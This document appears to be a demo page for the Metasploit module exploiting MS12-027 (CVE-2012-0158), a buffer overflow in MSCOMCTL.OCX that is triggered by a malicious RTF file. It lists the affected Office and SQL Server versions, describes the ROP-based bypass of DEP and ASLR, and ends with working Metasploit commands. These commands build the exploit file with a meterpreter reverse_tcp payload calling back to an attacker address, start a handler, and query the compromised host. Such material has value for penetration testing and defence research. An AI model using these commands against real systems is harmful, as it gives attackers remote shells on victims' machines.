MS12-027 MSCOMCTL ActiveX Buffer Overflow Metasploit Demo

Timeline :

Vulnerability reported by Unknown to the vendor
Public release of the vulnerability the 2012-04-10
Vulnerability found exploited in targeted attacks the 2012-04-12
Metasploit PoC provided the 2012-04-23

PoC provided by :

Unknown
juan vazquez
sinn3r

Reference(s) :

CVE-2012-0158
MS12-027
OSVDB-81125

Affected version(s) :

Microsoft Office 2003 SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2007 SP2
Microsoft Office 2007 SP3
Microsoft Office 2010 32-bit
Microsoft Office 2010 SP1 32-bit
Microsoft SQL Server 2000 Analysis SP4
Microsoft SQL Server 2000 SP4
Microsoft SQL Server 2005 Express Edition with Advanced SP4
Microsoft SQL Server 2005 for 32-bit SP4
Microsoft SQL Server 2005 for x64-bit SP4
Microsoft SQL Server 2008 for 32-bit SP2
Microsoft SQL Server 2008 for 32-bit SP3
Microsoft SQL Server 2008 for x64-bit SP2
Microsoft SQL Server 2008 for x64-bit SP3
Microsoft SQL Server 2008 R2 for 32-bit
Microsoft SQL Server 2008 R2 for x64-bit
Microsoft BizTalk Server 2002 SP1
Microsoft Commerce Server 2002 SP4
Microsoft Commerce Server 2007 SP2
Microsoft Commerce Server 2009
Microsoft Commerce Server 2009 R2
Microsoft Visual FoxPro 8.0 SP1
Microsoft Visual FoxPro 9.0 SP2
Visual Basic 6.0 Runtime

Tested on Windows XP Pro SP3 with :

Microsoft Office Word 2007 (12.0.4518.104)

Description :

This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses “msgr3en.dll”, which will load after office got load, so the malicious file must be loaded through “File / Open” to achieve exploitation.

Commands :

use exploit/windows/fileformat/ms12_027_mscomctl_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.21.47
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.21.47
exploit -j

getuid
sysinfo